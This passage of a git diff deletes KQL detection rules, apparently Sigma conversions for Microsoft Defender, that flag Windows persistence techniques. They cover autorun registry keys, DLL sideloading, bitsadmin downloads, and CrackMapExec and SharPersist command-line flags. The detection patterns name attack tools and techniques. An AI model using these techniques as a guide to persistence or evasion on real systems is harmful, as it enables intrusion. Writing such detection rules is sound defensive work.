InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey contains "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}" or RegistryKey contains "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}" or RegistryKey contains "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}" or RegistryKey contains "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair"))))
\ No newline at end of file
diff --git a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql
deleted file mode 100644
index 93060f91..00000000
--- a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and (not(((InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Image File Execution Options" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or ((RegistryKey contains "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or RegistryKey contains "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary") or ((RegistryValueData in~ ("DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval")))))
\ No newline at end of file
diff --git a/Persistence/DLL_Load_via_LSASS.kql b/Persistence/DLL_Load_via_LSASS.kql
deleted file mode 100644
index 0cc97026..00000000
--- a/Persistence/DLL_Load_via_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// Tags: attack.execution, attack.persistence, attack.t1547.008
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql b/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
deleted file mode 100644
index a620c15a..00000000
--- a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: high
-// Description: Detects changes to the default RDP port.
-Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
-Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 1a09cc4b..00000000
--- a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonhnathan Ribeiro, oscd.community
-// Date: 2020/10/16
-// Level: high
-// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Direct_Autorun_Keys_Modification.kql b/Persistence/Direct_Autorun_Keys_Modification.kql
deleted file mode 100644
index e8025ca6..00000000
--- a/Persistence/Direct_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell")
\ No newline at end of file
diff --git a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql b/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql b/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql b/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
index 30f379f3..00000000
--- a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql b/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
deleted file mode 100644
index 46977716..00000000
--- a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Varganov, Florian Roth (Nextron Systems)
-// Date: 2022/08/24
-// Level: high
-// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
-// Tags: attack.persistence, attack.t1547.001, cve.2022.30190
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin.kql b/Persistence/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Persistence/File_Download_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/HackTool_-_CrackMapExec_Execution.kql b/Persistence/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Persistence/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Persistence/HackTool_-_SharPersist_Execution.kql b/Persistence/HackTool_-_SharPersist_Execution.kql
deleted file mode 100644
index 75962c94..00000000
--- a/Persistence/HackTool_-_SharPersist_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/15
-// Level: high
-// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
-// Tags: attack.persistence, attack.t1053
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist")
\ No newline at end of file
diff --git a/Persistence/IE_Change_Domain_Zone.kql b/Persistence/IE_Change_Domain_Zone.kql
deleted file mode 100644
index b4770567..00000000
--- a/Persistence/IE_Change_Domain_Zone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql b/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
deleted file mode 100644
index 0213abe5..00000000
--- a/Persistence/IIS_Native-Code_Module_Command_Line_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/12/11
-// Level: medium
-// Description: Detects suspicious IIS native-code module installations via command line
-// Tags: attack.persistence, attack.t1505.003
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql b/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
deleted file mode 100644
index 5016e92a..00000000
--- a/Persistence/Internet_Explorer_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Internet Explorer" or RegistryKey contains "\\Software\\Microsoft\\Internet Explorer") and (RegistryKey contains "\\Toolbar" or RegistryKey contains "\\Extensions" or RegistryKey contains "\\Explorer Bars") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}" or RegistryKey contains "\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" or RegistryKey contains "\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}" or RegistryKey contains "\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}") or (RegistryKey endswith "\\Toolbar\\ShellBrowser\\ITBar7Layout" or RegistryKey endswith "\\Toolbar\\ShowDiscussionButton" or RegistryKey endswith "\\Toolbar\\Locked"))))
\ No newline at end of file
diff --git a/Persistence/Leviathan_Registry_Key_Activity.kql b/Persistence/Leviathan_Registry_Key_Activity.kql
deleted file mode 100644
index 2ebd1443..00000000
--- a/Persistence/Leviathan_Registry_Key_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aidan Bracher
-// Date: 2020/07/07
-// Level: critical
-// Description: Detects registry key used by Leviathan APT in Malaysian focused campaign
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd"
\ No newline at end of file
diff --git a/Persistence/MSExchange_Transport_Agent_Installation.kql b/Persistence/MSExchange_Transport_Agent_Installation.kql
deleted file mode 100644
index 734a09ec..00000000
--- a/Persistence/MSExchange_Transport_Agent_Installation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/08
-// Level: medium
-// Description: Detects the Installation of a Exchange Transport Agent
-// Tags: attack.persistence, attack.t1505.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Persistence/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Persistence/Microsoft_Office_DLL_Sideload.kql b/Persistence/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Persistence/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql b/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Persistence/Modify_User_Shell_Folders_Startup_Value.kql
+++ /dev/null
